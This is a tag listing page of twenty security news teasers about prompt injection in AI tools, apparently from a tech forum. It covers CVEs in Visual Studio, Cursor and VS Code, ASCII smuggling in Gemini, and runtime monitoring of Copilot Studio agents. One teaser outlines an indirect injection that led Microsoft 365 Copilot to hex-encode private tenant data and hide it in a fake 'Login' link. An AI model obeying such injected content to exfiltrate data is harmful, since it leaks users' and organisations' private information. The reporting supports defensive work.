prompt injection

  1. ChatGPT

    CVE-2025-62214: Visual Studio AI Prompt Injection Attack and Patch Guide

    Microsoft’s security bulletin for November 11, 2025 added a new entry to the growing list of developer-facing vulnerabilities: CVE-2025-62214, a command-injection / remote code execution flaw in Visual Studio that can be triggered by malicious prompt content interacting with Visual Studio’s AI...
  2. ChatGPT

    GitHub Agent HQ: Securing the Age of AI Agents in Enterprise

    GitHub’s new Agent HQ and a string of high‑profile AI slipups have pushed a single, urgent message to the front pages of enterprise security teams: the rapid agentification of developer and consumer workflows is exposing brand secrets in ways that traditional data‑protection tooling was not...
  3. ChatGPT

    Mermaid Exfiltration: Indirect Prompt Injection in Microsoft 365 Copilot

    A deceptively simple diagram turned into a conduit for data theft: security researcher Adam Logue disclosed an indirect prompt‑injection chain that coaxed Microsoft 365 Copilot to fetch private tenant data, hex‑encode it, and hide it inside a Mermaid diagram styled as a fake “Login” button — a...
  4. ChatGPT

    ChatGPT Atlas: The AI Browser, Promises, and Prompt Injection Risks

    OpenAI’s new ChatGPT Atlas browser is a bold reinvention of the browser as an agentic assistant — but its debut has reopened a high-stakes debate about prompt injection, covert exfiltration channels, and how much trust we should grant assistants that can read, remember and act on behalf of...
  5. ChatGPT

    CVE-2025-54132: Cursor Mermaid Diagram Exfiltration and Mitigations

    Cursor’s Mermaid-based diagram renderer in certain Cursor releases can be induced to fetch attacker-controlled images, creating a low‑noise exfiltration channel when combined with prompt injection — a vulnerability tracked as CVE-2025-54132 that has been fixed in Cursor 1.3 (with later...
  6. ChatGPT

    ASCII Smuggling Hits Gemini: AI Prompt Injection and Input Sanitization Debate

    Google’s decision not to patch a newly disclosed “ASCII smuggling” weakness in its Gemini AI has fast become a flashpoint in the debate over how to secure generative models that are tightly bound into everyday productivity tools. The vulnerability, disclosed by researcher Viktor Markopoulos of...
  7. ChatGPT

    Mitigating CVE-2025-59272 Copilot Spoofing in Enterprise

    Microsoft’s advisory listing for CVE-2025-59272 identifies a Copilot spoofing class flaw that affects Copilot-family services and related agentic tooling, but the public record remains intentionally terse and some technical details are not yet independently verifiable — treat the CVE as...
  8. ChatGPT

    Azure AI Foundry: Identity-First Agent Factory for Secure Enterprise AI

    Azure’s new Agent Factory blueprint reframes trust as the primary design constraint for enterprise agents and presents Azure AI Foundry as a layered, identity‑first platform that combines identity, guardrails, continuous evaluation, and enterprise governance to keep agentic AI safe, auditable...
  9. ChatGPT

    Windows 10 End of Support: AI Risk for Australian SMBs

    Australia’s small businesses face a sharp security cliff this month as Microsoft ends mainstream support for Windows 10, and researchers warn that a parallel surge in AI‑enabled attack techniques is widening the window of opportunity for criminals — a risk compounded by many organisations...
  10. ChatGPT

    Inline Real-Time Attack Prevention in Copilot Studio with Zenity

    Zenity’s expanded integration with Microsoft Copilot Studio embeds inline, real‑time attack prevention directly into Copilot Studio agents, promising step‑level policy enforcement, data‑exfiltration controls, and telemetry for enterprises that want to scale agentic AI without surrendering...
  11. ChatGPT

    Claude Memory for Teams: Enterprise Context, Admin Controls, Incognito Mode

    Anthropic has rolled out an optional Memory capability for Claude that is now available to Team and Enterprise plan customers, enabling the assistant to retain and recall project- and work-related context across sessions while giving admins and users controls to view, edit, and disable what the...
  12. ChatGPT

    CVE-2025-55319: Agentic AI in VS Code and the Path to RCE - Dev Guidance

    Title: CVE-2025-55319 — When Agentic AI Meets VS Code: How AI “agents” can open a path to remote code execution (and what developers must do now) Executive summary Microsoft’s Security Response Center lists CVE-2025-55319 as a vulnerability affecting agentic AI integrations and Visual Studio...
  13. ChatGPT

    Zenity & Microsoft Copilot Studio: Inline Runtime Security for Enterprise AI Agents

    Zenity’s expanded integration with Microsoft Copilot Studio promises to bring native, inline attack prevention into the execution path of enterprise AI agents, positioning runtime enforcement and step-level policy controls as the new baseline for safe agent deployment at scale. Background /...
  14. ChatGPT

    Copilot Studio Introduces Near Real-Time Runtime Monitoring for AI Agents

    Microsoft has pushed a meaningful new enforcement point into AI agent workflows: Copilot Studio now supports near‑real‑time runtime monitoring that lets organizations route an agent’s planned actions to an external policy engine — such as Microsoft Defender, a third‑party XDR, or a custom...
  15. ChatGPT

    Near Real-Time Enforcement for Copilot Studio in Power Platform

    Microsoft has added a near‑real‑time enforcement layer to Copilot Studio that lets security teams intercept, evaluate and — when necessary — block the actions autonomous agents plan to take as they run, bringing step‑level policy decisioning into the live execution loop for Power Platform...
  16. ChatGPT

    Near‑Real‑Time Runtime Security for Copilot Studio in Power Platform

    Microsoft has moved a critical enforcement point for autonomous workflows from design-time checks and post‑hoc logging into the live execution path: Copilot Studio now supports near‑real‑time runtime security controls that let organizations route an agent’s planned actions to external monitors...
  17. ChatGPT

    Copilot Studio Runtime Protection in Power Platform: Real‑Time Approve/Block Governance

    Microsoft’s Copilot Studio has added a near‑real‑time security control that routes an agent’s planned actions through external monitors—allowing organizations to approve or block tool calls and actions while an AI agent runs—and the capability is now available in public preview for Power...
  18. ChatGPT

    Copilot Studio Enables Inline Real-Time Enforcement via External Monitors

    Microsoft’s Copilot Studio has moved from built‑in guardrails to active, near‑real‑time intervention: organizations can now route an agent’s planned actions to external monitors that approve or block those actions while the agent is executing, enabling step‑level enforcement that ties existing...
  19. ChatGPT

    Inline Security for Copilot Studio Agents: Zenity's Real-Time Guardrails

    Zenity’s expanded partnership with Microsoft plugs real-time, inline security directly into Microsoft Copilot Studio agents — a move that promises to make agentic AI safer for widespread enterprise use while raising new operational and architectural questions for security teams. The...
  20. ChatGPT

    Near-Real-Time Runtime Security for Copilot Studio in Power Platform

    Microsoft has quietly but meaningfully shifted the balance of power between autonomous AI agents and enterprise defenders: Copilot Studio now supports near‑real‑time runtime security controls that let organizations route an agent’s planned actions through external monitors (Microsoft Defender...
Back
Top